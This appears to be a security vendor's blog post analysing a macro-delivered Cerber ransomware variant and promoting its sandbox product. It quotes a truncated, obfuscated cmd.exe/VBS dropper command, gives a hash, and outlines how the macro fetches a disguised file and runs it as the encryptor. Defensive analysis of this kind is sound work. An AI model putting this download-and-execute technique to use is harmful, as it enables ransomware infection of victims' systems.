Reports of a Zero-day attack affecting numerous Office 365 users emerged late last month (hat tip to the researchers at Avanan), and the culprit was a new variant of the Cerber ransomware discovered earlier this year. As with the other Zero-day threats that have been popping-up like mushrooms of late, the main methods of infection is through the use of Office macros.
This blog provides an analysis on the Cerber variant using traditional reverse-engineering and ThreatTrack’s newest version of our malware analysis sandbox, ThreatAnalyzer 6.1.
Reverse engineering in general, more often than not, requires that one gets a broad view as to what the target is doing. Whether you’re analyzing a malware sample or trying to figure what a function does from an obfuscated code, it is best to get the general “feel” of your target before narrowing down to the specifics.
ThreatAnalyzer is a sandbox that executes a program, file or URL in a controlled, monitored environment and provides a detailed report enabling the researcher or analyst to get a good look as to what the sample will do at run time. It is also worth noting that a sandbox is a good tool for generating Threat Intelligence to quickly get IOCs (Indicators of Compromise). The latest version of this sandbox, ThreatAnalyzer 6.1, has a built-in behavioral detection mechanism that enables users to see the general behavior of a sample and based on those particular set of behaviors, predict if the program in question is malicious or benign in nature.
Looking at the figure above, on the analysis screen, ThreatAnalyzer 6.1 has provided the following vital information on this particular sample:
- Determine that the sample is detected as malicious on 3 different fronts:
- ThreatIQ (our integrated threat intelligence server) observers the sample trying to beacon to blacklisted URLs
- The sample is detected by at least 1 or multiple antivirus engine(s)
- Based on the behavior that it performed, has a high probability that the sample is malicious
- Shows the researcher/user the changes in Registry, IO (File), Network attempts it made, and processes that it spawned
- Compacts all detailed information that it has gathered into a downloadable PDF or XML report. If a user chooses, he can download the archive which includes the detailed report, any significant files that was generated, screenshots of the windows spawned and a copy of the PCAP file if any network activities were logged
ThreatAnalyzer also provides a detailed report of the sample you analyzed in XML, JSON or PDF format. These reports contain the processes that were spawned, what files were modified, created or accessed, registries that were manipulated, objects that were created and any network connections that were made.
If we look further at the particular XML file of the sample we analyzed, we can gather the following activities:
- Spawned WINWORD.EXE (normal since we fed a DOTM file), but the process tree shows that it spawned
- Created a randomly named VBS file in %appdata%
- Cmd.exe /V /C set “GSI=%APPDATA%%RANDOM%.vbs” (for %i in (“DIm RWRL” “FuNCtioN GNbiPp(Pt5SZ1)” “EYnt=45” “GNbiPp=AsC(Pt5SZ1)” “Xn1=52” “eNd fuNCtiON” “SUb OjrYyD9()”Seeded another cmd.exe calling the VBS file
- Made an attempt to connect to
- Made a randomly named .TMP in %appdata% and executed it
- Hash: ee0828a4e4c195d97313bfc7d4b531f1
These are highly suspicious activities given that we were trying to analyze an Office document file. The behavior above cannot be classified as normal. So the next time you’re nervous on opening an attachment, even if it came from a person or organization you know, feed it to a sandbox like ThreatAnalyzer and have a look before running it on your production machine.
Good ol’ reverse engineering
Looking at how this ransomware was coded, it will not only infect Office 365 users but users of Office 2007 and above. The macro inside the Document_Open function will auto-execute once the malicious office attachment is opened. But this is also dependent on whether the macro settings is enabled or in earlier Office versions, security is set to low. And quite possibly in an attempt to slow down the analysis process and bypass traditional AV signatures, each iteration of this Cerber macro variant is obfuscated.
The macro will then proceed to the creation of a script located in %appdata%. The VBS is also obfuscated but luckily not encrypted. It is interesting to note a particular action that may or may not be an intended feature to bypass behavioral detection. It uses the Timer function to generate a random integer and compare it to a self-generated variable, all the while; this action will be the condition when code to download the cryptor component will ensue.
Using built in network features of VBS; it will attempt to connect to a remote server and attempt to download a particular file.
This may seem harmless as it is just a simple JPG file, right? Well, the VBS code also indicates that it will write whatever the contents of that file, save it to a .TMP in %appdata% and execute it. Although this technique has been used by other malware and dates back years ago, this seems interesting.
Md5 Hash: ee0828a4e4c195d97313bfc7d4b531f1
The downloaded file is the cryptor part of the Cerber ransomware. This program is the one responsible for scanning and encrypting target files on a victim’s system. The full analysis of this component will be discussed on a separate blog. It is interesting to note that the downloaded cerber executable will encrypt your files even in the absence of internet connection. The code inside the EXE indicates that it does not connect to a remote server (unlike the ones before it e.g. crytowall, locky, Teslacrypt, etc.) to encrypt the victim’s files.
Once a system is successfully infected it will display the following in the desktop.
And spawn an instance of your browser containing the message:
And play a sound “your documents, photos, databases, and other important files have been encrypted” in a robot voice.
- A spear-phishing email that contains a malicious Office attachment arrives.
- If the user opens the email, executed the attachment AND the macro setting for Office is set to enabled, the macro will execute spawning another VBS script.
- The script will contact a remote server, downloads and execute the cryptor part of the Cerber ransomware.
- Proceeds on scanning and encrypting the user’s files.
- Displays a notice that your system has been infected by Cerber ransomware.
Powered by WPeMatico